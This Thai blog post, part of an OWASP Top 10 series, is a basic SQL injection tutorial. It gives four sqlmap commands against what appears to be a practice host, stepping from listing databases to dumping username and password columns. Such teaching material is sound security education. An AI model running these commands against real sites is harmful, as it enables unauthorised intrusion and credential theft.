Post Top Ad

OWASP TOP 10

5.SQL Injection (OWASP A1) ท่า 1 กับการแฮกง่ายๆ

Rika L.

ช่องโหว่ SQL Injection

เป้าหมาย: อ่านรหัสผ่านของ user ในฐานข้อมูลออกมา

คำสั่ง SQLMap ต่าง ๆ

1.) แสดงรายชื่อฐานข้อมูล

sqlmap -u "http://hacking.p7z.pw:8200/read-news.php?newsid=3" -p newsid --dbs --batch


2.) แสดงรายชื่อตารางของฐานข้อมูลที่เลือก (news)

sqlmap -u "http://hacking.p7z.pw:8200/read-news.php?newsid=3" -p newsid -D news --tables


3.) แสดงรายชื่อคอลัมน์ของ ตารางที่เลือก (users)

sqlmap -u "http://hacking.p7z.pw:8200/read-news.php?newsid=3" -p newsid -D news -T users --columns


4.) นำข้อมูลของคอลัมน์ในตารางที่เลือก (username,password) ออกมาแสดง

sqlmap -u "http://hacking.p7z.pw:8200/read-news.php?newsid=3" -p newsid -D news -T users -C username,password --dump


เพิ่มเติม

พิมพ์ใน Terminal ว่า

sqlmap -hh

หรือ

     แนะนำให้เปิดในyoutube 1080p 

การแฮกท่าที่1 basic 


Tags:

สวัสดี ฉันคือ L. อยากจะทำสิ่งใดให้ศึกษาสิ่งนั้น

Related Posts

1 ความคิดเห็น:

  1. ComeAndPlayWithUsDanny17 กรกฎาคม 2563 เวลา 08:00

    อ๋อๆ โค๊ดนี่ก็เหมือน เกียรติศักดิ์ เสนาเมือง ใช่ไหมครับคุณสโนว์เดน ^_^

    ตอบลบ

สมัครสมาชิก: ส่งความคิดเห็น (Atom)

Post Bottom Ad